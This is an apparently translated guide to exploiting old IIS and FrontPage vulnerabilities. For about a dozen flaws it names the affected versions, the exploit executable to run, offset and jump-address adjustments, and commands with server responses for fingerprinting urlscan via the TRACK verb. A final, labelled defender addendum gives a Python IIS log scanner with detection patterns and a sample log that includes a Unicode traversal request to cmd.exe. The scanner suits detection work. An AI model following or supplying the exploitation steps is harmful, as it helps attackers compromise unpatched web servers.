Yuan Ge
1. Recognizing urlscan. Because some of the vulnerabilities below cannot be exploited once urlscan is installed, you may first need to determine whether urlscan is present. With urlscan the TRACK verb is rejected with a 404; without it the server echoes the request back.
urlscan installed:
Getiisfile 192.168.5.9 80 "TRACK/" 1
Return value:
HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.1
Date: Mon, 15 Jul 2002 04:50:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 108
<Html> Not Found

urlscan not installed:
Getiisfile 192.168.5.15 80 "TRACK/" 1
Return value:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 15 Jul 2002 04:52:10 GMT
Content-Type: message/http
Content-Length: 39
TRACK/aa HTTP/1.1
HOST: 192.168.5.15
2. iis4.0 .htr overflow.
Applicability: winnt + iis4.0 up to sp5.
Usage: iisftp\debug\iisftp.exe 192.168.5.15 1
The final argument is the offset value, which ranges from 0 to 3.
3. .ida and .idq overflow.
Applicability: unpatched winnt + iis4.0 and win2000 + iis5.0.
Program:
Simplified Chinese win2000 + iis5.0: ida\debug\ida.exe
win2000 + iis5.0, win2000 + iis5.0 + sp1: ida2\debug\ida.exe
For winnt + iis4.0 the jump instruction address must be adjusted.
4. printer overflow.
Applicability: unpatched win2000 + iis5.0.
Program: ipp\debug\ipp.exe
For sp2 the jump instruction address may need to be adjusted.
5. unicode and decode vulnerabilities.
Applicability: winnt + iis4.0, win2000 + iis5.0
Program: iisfile\debug\getiisfile2.exe
The request can also be entered directly in the browser.
6. frontpage2000 extensions overflow.
Applicability: Microsoft FrontPage 2000 Server Extensions + IIS4.0/IIS5.0
Program: fp30reg\debug\fp30.exe
7. dvwssr.dll overflow.
Applicability: Microsoft FrontPage 98 Server Extensions + IIS4.0/IIS5.0
Program: dvwssr\debug\dvwssr.exe
8. asp overflow.
Applicability: winnt + iis4.0, win2000 + iis5.0, winxp + iis5.1 without the security bulletin MS02-018 patch.
Program:
I. File overflow.
Program:
win2000 + iis5.0: asp\debug\asp.exe
Simplified Chinese winnt + iis4.0: asall\debug\asp.exe
You must supply the path of an asp file on the server; that file must contain an include or MapPath statement that uses a relative path.
II. Chunked encoding overflow.
Program:
win2000 + iis5.0: aspcode\debug\aspcode.exe
aspcode2\debug\aspcode.exe
aspcode3\debug\aspcode.exe
Program 1 or 3 can be used.
On other system versions the jump instruction address must be adjusted.
9. perlis.dll overflow.
Applicability: IIS4.0/IIS5.0 with perlis.dll mapped to .cgi or .pl
Program: perlis\debug\perlis.exe
In practice you may need to change the virtual directory in the request string to match the mapped virtual directory, and adjust the offset according to the mapped file name.
10. Overflows in some counters.
How to find counters: 1. search the home page source for counter programs such as .exe, .dll, .cgi, .pl; 2. request /cgi-bin/, /count/, /counter/ and inspect the returned information.
Program: counter\Debug\counover.exe
If no known overflow matches, use the getiisfile method to send requests while varying the length of the string after "?", and judge from the returned information whether an overflow exists. You can also look for a free version of the counter based on the returned information and copyright notice, then test that version and write a suitable overflow program.
11. webdav overflow.
Applicability: win2000 + iis5.0 without urlscan and with no permission restriction on httpext.dll. No patch has been released.
Program:
Simplified Chinese win2000 + iis5.0: webdav\debug\webdav.exe
Traditional Chinese win2000 + iis5.0: webdavtw\debug\webdav.exe
Non-Far-East win2000 + iis5.0: webdaven\debug\webdav.exe
12. webdav exposes source files.
Applicability: win2000 + iis5.0
Program: getiisfile.exe
Example: getiisfile 192.168.5.9 80 "GET/default.asp" 65535 a tf
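A defender-side counterpart to the list above, added here as an example and not a tool from the original page: it scans IIS W3C extended log records for the TRACK probe of item 1 and for requests to the ISAPI extensions, FrontPage DLLs and Unicode traversal paths that items 2 to 9 target. The log lines and rule names are constructed for illustration; the parser takes its column names from the #Fields: header, so it works with whatever fields the server logs.

```python
import re
from collections import Counter

# Constructed sample IIS W3C extended log (not from the page); requests mirror the probes above.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-15 04:50:25 192.168.5.20 TRACK / - 404
2002-07-15 04:52:10 192.168.5.20 TRACK /aa - 200
2002-07-15 04:55:01 192.168.5.20 GET /default.ida XXXXXXXXXXXXXXXX 200
2002-07-15 04:56:30 192.168.5.20 GET /NULL.printer - 500
2002-07-15 04:57:12 192.168.5.20 GET /_vti_bin/_vti_aut/dvwssr.dll - 200
2002-07-15 04:58:44 192.168.5.20 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2002-07-15 05:00:00 10.0.0.7 GET /index.htm - 200
"""

# One rule per ISAPI extension / DLL / traversal pattern the list above covers.
PATH_RULES = [
    ("htr_isapi", re.compile(r"\.htr$", re.I)),
    ("ida_idq_isapi", re.compile(r"\.id[aq]$", re.I)),
    ("printer_isapi", re.compile(r"\.printer$", re.I)),
    ("frontpage_dll", re.compile(r"/(fp30reg|dvwssr)\.dll$", re.I)),
    ("perlis_dll", re.compile(r"/perlis\.dll$", re.I)),
    ("unicode_traversal", re.compile(r"\.\.(%c[01]%[0-9a-f]{2}|%25|%5c|/)", re.I)),
]
PROBE_METHODS = {"TRACK", "TRACE"}

def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw and not raw.startswith("#") and fields:
            yield dict(zip(fields, raw.split()))

def classify(rec):
    """Return the rule names one log record triggers (empty list if benign)."""
    hits = []
    method, stem = rec["cs-method"].upper(), rec["cs-uri-stem"]
    if method in PROBE_METHODS:  # 200 to TRACK/TRACE: verb not blocked, i.e. no urlscan
        hits.append("track_allowed" if rec["sc-status"] == "200" else "track_probe")
    hits += [name for name, pat in PATH_RULES if pat.search(stem)]
    return hits

def scan_iis_log(text):
    """Return (findings, per-rule counts); each finding is (client ip, path, rule)."""
    findings = [(rec["c-ip"], rec["cs-uri-stem"], rule)
                for rec in parse_w3c(text) for rule in classify(rec)]
    return findings, Counter(rule for _, _, rule in findings)
```

A "track_allowed" hit is the server-side view of the 200 response shown in item 1: the verb reached IIS, so urlscan (or an equivalent verb filter) is not in front of it.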